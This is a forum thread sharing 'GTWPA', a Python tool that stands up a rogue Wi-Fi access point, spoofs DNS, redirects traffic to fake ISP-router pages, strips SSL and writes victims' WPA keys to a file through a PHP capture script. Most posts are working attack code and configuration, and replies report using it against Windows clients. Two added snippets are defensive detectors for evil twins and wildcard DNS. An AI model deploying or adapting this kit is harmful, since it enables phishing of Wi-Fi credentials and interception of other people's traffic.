Thread: WPA Stealer & All-in-One

  1. #1
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    WPA Stealer & All-in-One

    Hello All,


    I'm quite a noob actually, but I'd like to share the work I made for the GTWPA project on crack-wifi (a French forum about wifi).

    -- So, here is the idea :

    - Create a fake AP
    - Force the client/victim to connect to it
    - Run an HTTP server that redirects all his requests to a fake page
    - Invite him to enter his WPA key
    - Write it to a .txt file
    - PwNeD

    --

    Before anything, I want to say that I'm really a noob, so my code will not be good, but it works on BT4 R1. If anyone has interesting things to say, do not hesitate; it will be great for my knowledge.

    --

    To make the script work, you need some kind of fake page; you can find French fake pages on crack-wifi.com.


    Here is the script :

    Code:
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    
    # VERSION & AUTHOR
    __app__ = 'GTWPA'
    __version__ = '1.0'
    __author__ = 'Carto_'
    
    # fonctions.py lives next to this script; the star import also brings in
    # os, sleep and sysexit, which are imported at module level over there.
    # Names imported this way are copied once, so menu() returns the choice
    # instead of setting a global that this module would never see.
    from fonctions import *
    
    checkRoot()
    SECTION = menu()
    while SECTION != 8:
    
        # Install
        if SECTION == 1:
            screen_clear()
            print " -- INSTALLATION GTWPA -- "
            installation()
            sleep(2)
            screen_clear()
            SECTION = menu()
    
        # Launch apache2
        elif SECTION == 2:
            screen_clear()
            print "-- Launching Apache2 server --"
            sleep(2)
            os.system("service apache2 start")
            sleep(2)
            screen_clear()
            SECTION = menu()
    
        # Verification of the fake page
        elif SECTION == 3:
            screen_clear()
            print "-- VERIFICATION OF THE FAKE PAGE --"
            sleep(2)
            os.system("firefox 127.1.1.0")
            print "-- All is ok ? So, let's go ! --"
            sleep(2)
            screen_clear()
            SECTION = menu()
    
        # Configuring the rogue AP
        elif SECTION == 4:
            screen_clear()
            print "-- CONFIGURATION OF THE ROGUE AP --"
            recup_config()
            dhcpd_creator()
            sleep(2)
            screen_clear()
            SECTION = menu()
    
        # Launching the rogue AP
        elif SECTION == 5:
            screen_clear()
            print "-- Launching the Rogue AP --"
            rogue_ap_launch()
            dhcp_launch_rogue()
            dnsspoof_launch()
            sleep(2)
            screen_clear()
            SECTION = menu()
    
        # Soft AP sslstriped
        elif SECTION == 6:
            print "-- Launching of the SOFT AP Ssltriped --"
            # stop whatever option 5 left running (the DHCP binary is dhcpd3 on BT4)
            os.system("killall -9 dhcpd3 dhcpd tcpdump airbase-ng dnsspoof")
            rogue_ap_launch()
            dhcp_launch_soft()
            os.system("xterm -hold -e sslstrip -a -k -f &> /dev/null &")
            sleep(2)
            os.system("xterm -hold -e ettercap -T -q -p -i at0 &> /dev/null &")
            sleep(2)
            print "Soft AP Launched, waiting clients to connect"
            sleep(2)
            screen_clear()
            SECTION = menu()
    
        # Option 7 is not implemented yet, any other number is rejected
        else:
            screen_clear()
            print "BAD CHOICE"
            SECTION = menu()
    
    
    # END
    
    screen_clear()
    print "-- Thx, do not hesitate to report bugs ! --"
    remise_zero()
    sleep(2)
    screen_clear()
    sysexit()



    So, to run the script you need to put in /root/GTWPA :

    - numericable.tar.gz, freebox.tar.gz
    * with an index file
    * a valid.php file (code here):

    Code:
    <?php
    $pass = $_POST['password'];
    $usr = $_POST['username'];
    
    $fp = fopen("keywpa.txt","a"); 
    fputs($fp, "$usr");
    fputs($fp, "\n"); 
    fputs($fp, "$pass");
    fclose($fp);
    ?>
    * a .htaccess file containing: ErrorDocument 404 http://192.168.1.129/index.html

    And that's all !
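The rogue AP described in this post is exactly what a wireless IDS is built to spot: a known ESSID beaconed from a BSSID the inventory does not list, or from a cloned BSSID without the encryption the real AP uses. The following Python 3 check is an added example written for this thread, not code from the GTWPA project; the inventory, the scan rows and the MAC addresses are constructed sample values.

```python
from collections import namedtuple

# One row as a wireless scanner (airodump-ng, kismet, ...) reports it
Beacon = namedtuple("Beacon", "bssid essid channel privacy")

# Inventory of the APs we own: ESSID -> {BSSID: (channel, privacy)} (constructed)
KNOWN_APS = {
    "Freebox-1234": {"00:11:22:33:44:55": (6, "WPA2")},
    "Livebox-abcd": {"66:77:88:99:aa:bb": (11, "WPA2")},
}

# Constructed scan: the two real APs, a twin that cloned the Freebox BSSID but
# beacons open on another channel (what airbase-ng -a/-e/-c produces), a twin
# of the Livebox on a fresh BSSID, and a neighbour's network we do not own.
SAMPLE_SCAN = [
    Beacon("00:11:22:33:44:55", "Freebox-1234", 6, "WPA2"),
    Beacon("66:77:88:99:AA:BB", "Livebox-abcd", 11, "WPA2"),
    Beacon("00:11:22:33:44:55", "Freebox-1234", 1, "OPN"),
    Beacon("DE:AD:BE:EF:00:01", "Livebox-abcd", 11, "OPN"),
    Beacon("12:34:56:78:9A:BC", "NEUF_ABCD", 3, "WPA"),
]

def find_evil_twins(scan, known=KNOWN_APS):
    """One alert per beacon that impersonates an ESSID of the inventory: our
    ESSID from a BSSID we do not own, or our own BSSID with other settings."""
    alerts = []
    for b in scan:
        if b.essid not in known:
            continue                           # not one of our networks
        bssid = b.bssid.lower()
        expected = known[b.essid].get(bssid)
        reasons = []
        if expected is None:
            reasons.append("unknown BSSID %s" % bssid)
        else:
            chan, priv = expected
            if b.privacy != priv:
                reasons.append("cloned BSSID with %s instead of %s" % (b.privacy, priv))
            if b.channel != chan:
                reasons.append("channel %d instead of %d" % (b.channel, chan))
        if not reasons:
            continue                           # matches the inventory
        # an open twin of a WPA network is exactly the key-phishing setup;
        # our own BSSID merely moving channel is the least alarming case
        cloned = expected is not None and b.privacy != expected[1]
        severity = "high" if b.privacy == "OPN" or cloned else ("medium" if expected is None else "low")
        alerts.append({"essid": b.essid, "bssid": bssid, "channel": b.channel,
                       "severity": severity, "reasons": reasons})
    return alerts
```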

  2. #2
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Re: WPA Stealer & All-in-One

    And here is fonctions.py:

    Code:
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    #### FUNCTIONS FOR GTWPA-1.0 ####
    
    # Import cmd (OS: BT4 R1)
    
    import os
    from sys import exit as sysexit
    from commands import getoutput
    from time import sleep
    from os import chdir
    
    GTWPA_DIR = "/root/GTWPA"   # where we find the script and the files it uses
    chdir(GTWPA_DIR)
    
    # Menu choice -> (box name, tarball holding the fake page of that box)
    BOXES = {
        1: ("Numéricable", "numericable.tar.gz"),
        2: ("Freebox", "freebox.tar.gz"),
        3: ("Livebox", "livebox.tar.gz"),
        4: ("SFR-Neufbox", "neufboxsfr.tar.gz"),
        5: ("Tele2box SpeedTouch", "tele2box.tar.gz"),
        6: ("Neufbox Originale", "neufbox.tar.gz"),
    }
    
    
    def installation():
        os.system("mkdir -p %s" % GTWPA_DIR)
        print "INSTALL IN PROGRESS ... ... ..."
        print "What kind of box ?"
        for num in sorted(BOXES):
            print "%d. %s" % (num, BOXES[num][0])
        # Ask again until one of the numbers above is given
        box_choisie = None
        while box_choisie not in BOXES:
            try:
                box_choisie = int(raw_input())
            except ValueError:
                box_choisie = None
            if box_choisie not in BOXES:
                print "BAD ENTRY"
        name, tarball = BOXES[box_choisie]
        print name
        os.system("cp %s/%s /var/www" % (GTWPA_DIR, tarball))
        chdir("/var/www/")
        os.system("tar -xvzf %s" % tarball)
        os.system("chmod -R 777 /var/www")
        print "INSTALL FINISH"
        chdir(GTWPA_DIR)
    
    
    def airBase(BSSID, ESSID, CHANNEL, IFACE):
        os.system("modprobe tun >/dev/null 2>&1")
        os.system("xterm -e airbase-ng -a %s -e '%s' -c %s %s &>/dev/null &" % (BSSID, ESSID, CHANNEL, IFACE))
        sleep(2)
    
    
    def checkRoot():
        if getoutput('whoami') != 'root':
            print("You have to be root!")
            sysexit()
    
    
    def screen_clear():
        os.system("clear")
        print("\n\t\t\t[GTWPA]")
    
    
    def save_iptables():
        # remise_zero() restores this file; without it there is nothing to restore
        os.system("iptables-save > %s/iptables.rules" % GTWPA_DIR)
    
    
    def dhcpd_creator():
        DHCPDCONF = """
    ## Configuration auto-generated by the WPA_GRABBER program
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    authoritative;
    subnet 192.168.1.128 netmask 255.255.255.128 {
        option subnet-mask 255.255.255.128;
        option broadcast-address 192.168.1.255;
        option routers 192.168.1.129;
        option domain-name-servers 208.67.222.222;
        range 192.168.1.130 192.168.1.140;
    }
    ## End of SoftAP auto-generated config
    """
        # Writing dhcpd.conf
        chdir(GTWPA_DIR)
        configfile = open('dhcpd.conf', 'w')
        configfile.write(DHCPDCONF)
        configfile.close()
    
    
    def recup_config():
        "Collect the parameters of the rogue AP"
        global IFACE
        global CHANNEL
        global ESSID
        global BSSID
        IFACE = raw_input("\n-- Interface used for the rogue ?\n>>> ")
        # The interface must exist
        while IFACE not in getoutput('iwconfig'):
            print("Interface %s not found\n" % IFACE)
            IFACE = raw_input("\n-- Interface used for the rogue ?\n>>> ")
    
        # BSSID of the rogue AP: 17 characters and 5 colons, or blank to keep
        # the current MAC of the interface
        BSSID = raw_input("\nBSSID ? (leave blank if you don't want any change)\n>>> ")
        while (len(BSSID) != 17) or (BSSID.count(':') != 5):
            if BSSID == '':
                BSSID = getoutput('macchanger -s ' + IFACE + " | awk '{print $3}'")
                break
            print("BSSID %s not valid, please try again" % BSSID)
            BSSID = raw_input("\nBSSID ? (leave blank if you don't want to change)\n>>> ")
    
        # ESSID of the rogue AP
        ESSID = raw_input("\nESSID ?\n>>> ")
        while ESSID == '':
            print("The ESSID is needed")
            ESSID = raw_input("ESSID ?\n>>> ")
    
        # Channel: check isdigit() before int() so a letter does not crash
        CHANNEL = raw_input("\nCHANNEL ?\n>>> ")
        while not (CHANNEL.isdigit() and 0 < int(CHANNEL) < 14):
            print("Channel %s is not a valid channel, please try again (1-13)" % CHANNEL)
            CHANNEL = raw_input("CHANNEL ?\n>>> ")
    
    
    def rogue_ap_launch():
        print("\n\n LAUNCHING AIRBASE-NG")
        airBase(BSSID, ESSID, CHANNEL, IFACE)
        sleep(3)
        # at0 is the tap interface airbase-ng creates for the clients
        os.system('modprobe tun && \
                   ifconfig at0 up && \
                   ifconfig at0 192.168.1.129 netmask 255.255.255.128 && \
                   ifconfig at0 mtu 1500 && \
                   route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129')
        sleep(2)
    
    
    def dhcp_launch_rogue():
        print("\n LAUNCHING DHCP SERVER")
        os.system("xterm -hold -e dhcpd3 -d -f -cf %s/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null &" % GTWPA_DIR)
        save_iptables()
        os.system("iptables --flush")
        os.system("iptables --table nat --flush")
        os.system("iptables --delete-chain")
        # Let the clients of at0 through
        os.system("iptables --append FORWARD --in-interface at0 -j ACCEPT")
        # Every UDP packet (so every DNS query) goes to the OpenDNS resolver
        os.system("iptables -t nat -A PREROUTING -p udp -j DNAT --to 208.67.222.222")
        # Every HTTP request ends on the local fake page
        os.system("iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.1.129:80")
        os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
    
    
    def dhcp_launch_soft():
        "DHCP FOR SOFT AP"
        print("\n LAUNCHING DHCP")
        os.system("xterm -hold -e dhcpd3 -d -f -cf %s/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null &" % GTWPA_DIR)
        save_iptables()
        os.system("iptables --flush")
        os.system("iptables --table nat --flush")
        os.system("iptables --delete-chain")
        # The soft AP gives real internet access through eth0 ...
        os.system("iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE")
        os.system("iptables --append FORWARD --in-interface at0 -j ACCEPT")
        os.system("iptables -t nat -A PREROUTING -p udp -j DNAT --to 208.67.222.222")
        # ... but HTTP goes through sslstrip, which listens on port 10000
        os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000")
        os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
    
    
    def dnsspoof_launch():
        print " LAUNCHING DNSSPOOF"
        # Write the hosts file before starting dnsspoof, which reads it at startup
        DNSSPOOF = "192.168.1.129 *\n"
        chdir(GTWPA_DIR)
        configfile = open('dns.txt', 'w')
        configfile.write(DNSSPOOF)
        configfile.close()
        os.system("xterm -hold -e dnsspoof -i at0 -f %s/dns.txt &> /dev/null &" % GTWPA_DIR)
    
    
    def remise_zero():
        print(" LEAVING AND RESTORE ")
        chdir(GTWPA_DIR)
        # Stop everything the script may have started, then undo the NAT rules
        os.system('killall -9 dhcpd3 airbase-ng dnsspoof sslstrip ettercap; '
                  'iptables -t nat -F && iptables -t nat -X && iptables -t nat -Z && '
                  'echo 0 > /proc/sys/net/ipv4/ip_forward')
        if os.path.exists('iptables.rules'):
            os.system('iptables-restore < iptables.rules')
            os.remove('iptables.rules')
        for leftover in ('dhcpd.conf', 'dns.txt'):
            if os.path.exists(leftover):
                os.remove(leftover)
        print("\n === thx, do not hesitate to report bugs\n")
        sysexit()
    
    
    def menu():
        print " --- *** SCRIPT CODED BY CARTO_ *** ---"
        print "1. INSTALL GTWPA"
        print "2. Launch the web server"
        print "3. Verification of the Fake Page"
        print "4. Configure the Rogue"
        print "5. Launch Rogue"
        print "6. SOFT AP Sslstriped"
        print "7. Option deauth client (COME SOON)"
        print "8. LEAVE AND RESTORE"
        print "Your Choice ?"
        # Return the choice (a global set here is not seen by the caller,
        # which imported this module with "from fonctions import *");
        # anything that is not a number counts as a bad choice
        try:
            return int(raw_input())
        except ValueError:
            return 0
    
    
    ###  END FUNCTIONS ###
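From the client side, the wildcard rule (`192.168.1.129 *`) that dnsspoof_launch() writes for dnsspoof is easy to test for: every name, including one that cannot exist, resolves to the gateway. This Python 3 probe is an added example for this thread, not part of fonctions.py; the two resolvers and the addresses are constructed so it runs offline, and for a live check the `resolve` argument would be a small wrapper around `socket.gethostbyname` that returns None on `socket.gaierror`.

```python
import ipaddress
from typing import Callable, Optional

# Unrelated names that should resolve to different addresses, plus a canary
# under the reserved .invalid TLD that must never resolve (constructed list)
PROBES = ["example.com", "example.net", "example.org", "no-such-host.invalid"]

def detect_wildcard_dns(resolve: Callable[[str], Optional[str]], gateway: str) -> dict:
    """Probe the resolver the way any client can. dnsspoof fed with
    '192.168.1.129 *' answers every query, the canary included, with the
    gateway address, so all probes collapse onto one local address."""
    answers = {name: resolve(name) for name in PROBES}
    resolved = {name: ip for name, ip in answers.items() if ip}
    reasons = []
    canary = answers[PROBES[-1]]
    if canary:
        reasons.append("canary %s resolved to %s" % (PROBES[-1], canary))
    distinct = set(resolved.values())
    if len(resolved) >= 3 and len(distinct) == 1:
        addr = distinct.pop()
        reasons.append("all %d answers are %s" % (len(resolved), addr))
        if addr == gateway:
            reasons.append("that address is the default gateway")
        elif ipaddress.ip_address(addr).is_private:
            reasons.append("that address is in a private range")
    return {"spoofed": bool(reasons), "reasons": reasons, "answers": answers}

# Constructed resolvers standing in for socket.gethostbyname on the two networks
ROGUE_GATEWAY = "192.168.1.129"            # at0 address used by the script

def spoofed_resolver(name: str) -> Optional[str]:
    return ROGUE_GATEWAY                   # what the wildcard rule produces

CLEAN_TABLE = {"example.com": "198.51.100.10", "example.net": "198.51.100.20",
               "example.org": "198.51.100.30"}   # TEST-NET-2 placeholders

def clean_resolver(name: str) -> Optional[str]:
    return CLEAN_TABLE.get(name)           # NXDOMAIN -> None
```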

  3. #3
    Junior Member
    Join Date
    Aug 2010
    Posts
    64

    Re: WPA Stealer & All-in-One

    I like what I see here, I'd like to incorporate some of this in my script... My Blog

  4. #4
    Member
    Join Date
    Feb 2010
    Posts
    50

    Re: WPA Stealer & All-in-One

    Can you make it on video?

  5. #5
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Re: WPA Stealer & All-in-One

    Yes, I will make a video tutorial soon where I explain how to make it work. In something like 2 or 3 days I'll post it here.

  6. #6
    Junior Member Liuser's Avatar
    Join Date
    Apr 2010
    Posts
    58

    Re: WPA Stealer & All-in-One

    Just tested this Rogue AP script.

    I had to make a few changes to the script since the Python interpreter complained. I'm not sure if there is a discrepancy in versions between BT4 (which I still am on) and BT4R1's Python version and settings to throw those errors.

    Anyhoo - besides the initial easy to fix errors, the script works great and is easily modifiable and readable. I made some changes primarily adding variables to the top of the script so I can change the installation directories and configuration directories much more easily (default /root/GTWPA in your script). A major complaint I have is that it appears you have some packages to install on Option 1 to load the custom phishing login pages where you extract a bunch of *.tar.gz files. Afterwards you issue a recursive chmod 777 in /var/www. I wouldn't necessarily want to perform this command for obvious security reasons.

    Thanks and good work.

    Edit: I am not sure why, but I could not get the attack to work against OSX machines. It appears that DHCP fails to issue an IP to OSX for whatever reason (digging into it more). Windows machines work fine.
    Last edited by Liuser; 11-04-2010 at 04:17 AM.

  7. #7
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Re: WPA Stealer & All-in-One

    I've got the same problem with Mac OS X users. I don't know why, but they can't obtain a valid IP ... If someone has an idea ...

  8. #8
    Junior Member wh1t3fang's Avatar
    Join Date
    Nov 2010
    Location
    from the internet
    Posts
    75

    Re: WPA Stealer & All-in-One

    Nice rogue hotspot script.
